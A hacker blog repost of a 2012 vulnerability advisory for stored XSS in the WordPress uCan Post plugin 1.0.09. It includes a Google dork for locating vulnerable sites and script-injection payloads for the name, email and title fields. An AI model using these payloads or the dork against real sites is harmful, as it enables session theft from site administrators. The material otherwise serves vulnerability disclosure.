.
Dr. Cruzz. Diberdayakan oleh Blogger.

Imagination Will Take You Everywhere, Get the Codes and Feel the Soul
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv1: ~]#...
./e0f
[+] Post Title :

Wordpress uCan Post plugin 1.0.09 Stored XSS


[+] Date : Rabu, 01 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : http://xcruzz.blogspot.com/2012/02/wordpress-ucan-post-plugin-1009-stored.html
[+] Type :
# Exploit Title: Wordpress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09

1) You need permissions to publish a post from the public interface:

The submission form is not well sanitized and will result in stored xss
in admin pages:

* Name field is not sanitized and it's injectable with a payload
which will be stored in the pending submission page in admin panel
POC: myname'"><script>window.alert(document.cookie)</script>

* Email field is not sanitized but can it will check for a valid email address
so the maximum result will be a reflected xss
POC: my@mail.com'"><script>window.alert(document.cookie)</script>

* Post Title is not sanitized and it's injectable with a payload
which will be stored in the pending submissions page in admin panel
POC: title'"><script>window.alert(document.cookie)</script>

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)